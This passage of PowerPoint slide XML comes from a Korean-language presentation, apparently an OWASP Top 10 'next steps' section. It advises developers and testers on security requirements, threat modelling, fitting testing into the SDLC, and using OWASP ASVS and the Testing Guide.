                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>애플리케이션</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="12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보안</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="12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ko-KR" altLang="en-US" sz="900" b="1" kern="12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교육</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900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+D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개발자를 위한 다음 단계</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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2D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143635" y="3119064"/>
            <a:ext cx="103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j-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>애플리케이션</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>보안</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>요구사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj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040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130051" y="6207001"/>
            <a:ext cx="107387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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>개발</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>보안</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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900" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>생명주기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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53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테스터를 위한 다음 단계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7203"/>
            <a:ext cx="1295400" cy="707886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+T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19678"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="971600"/>
          <a:ext cx="6858000" cy="7997672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지속적인 애플리케이션 보안 테스트가 필요합니다</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD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코드를 안전하게 작성하는 것이 중요합니다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당신이 구축하려는 보안이 실제로 적용 가능한지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적절히 수행가능한지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보안을 필요로 하는 어느 곳에서나 적용가능한지를 확인하는 것도 중요합니다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애플리케이션 보안테스트의 목표는 증거를 제공하는 것입니다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이러한 작업은 매우 어렵고 복잡합니다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또한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0"/>
                        <a:t>Agile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>이나 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0" err="1"/>
                        <a:t>DevOps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>와 같은 고속의 성능을 요하는 개발 프로세스는 전통적인 방식이나 툴을 사용하기에는 한계가 있습니다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따라서 전체 애플리케이션 포트폴리오에서 가장 중요한 부분에 집중하고 비용적인 측면에서 효율적인 방법을 생각해야 함을 권장합니다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현대사회에서의 보안위험은 빠르게 변하기 때문에 매년 실시하는 응용프로그램에 대한 취약점 검사는 오랜 시간이 흘렀을 수 있습니다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따라서 현재 개발되는 소프트웨어는 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전체 소프트웨어 개발 라이프사이클에 걸쳐 지속적인 보안테스트가 필요합니다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어떤 방식으로 접근하든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한 프로그램에 대한 테스트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분류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재조정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재검사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err="1"/>
                        <a:t>재배포에</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> 드는 연간 비용을 고려해야 합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0"/>
                        <a:t>.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-936485" y="3266855"/>
            <a:ext cx="8763000" cy="5040560"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3094911"/>
              <a:ext cx="5608321" cy="748772"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 56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043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="56083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5283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="93474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1000" kern="1200" dirty="0"/>
                <a:t>테스트를 시작하기에 앞서</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>어떤 것에 시간을 할애하는 것이 중요한지 알아야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>우선순위는 위협모델에 따라 산출되므로 위협모델이 없는 경우 테스트 전에 미리 생성해야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP ASVS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>와 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>테스트 가이드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>를 참고하고 비즈니스에 있어 어떤 것이 중요한지 툴 벤더에 의존하여 결정하지 않아야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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92845" y="2974010"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 9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189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1567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baseline="0" dirty="0"/>
                <a:t>위협모델의 이해</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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133034" y="4085260"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 56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043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="56083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5283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="93474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1000" dirty="0"/>
                <a:t>애플리케이션 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>보안테스트는 소프트웨어 개발 수명주기</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>(SDLC)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>를 사용함에 있어 사용자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프로세스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도구와 호환성이 높아야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>추가적인 단계</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="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1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>리뷰 등을 강요하는 것은 마찰을 일으킬 수 있습니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"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1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>보안 정보를 수집하려는 기회를 찾고</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="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1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>프로세스에 대한 피드백을 하려고 해야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline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92845" y="3988629"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 9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189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1567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baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>SDLC</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>의 이해</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline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33034" y="5099878"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 56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043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="56083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5283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="93474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1000" dirty="0"/>
                <a:t>각 요구사항을 검증하기 위하여 가장 간단하고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신속하며 적절한 기술을 찾으십시오</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>보안지식 프레임 워크</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>와 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>애플리케이션 보안 검증 표준</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>은 개별 및 통합 테스트에서 기능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비기능적인 보안 요구 사항의 큰 자원이 될 수 있습니다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인적 자원은 자동화된 툴 사용으로 부터 오는 잘못된 허용률과 잘못된 거부율을 다룬다는 것을 고려해야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1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92845" y="5003248"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 9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189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1567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dirty="0"/>
                <a:t>테스트 전략</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="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33034" y="6114496"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 56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043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
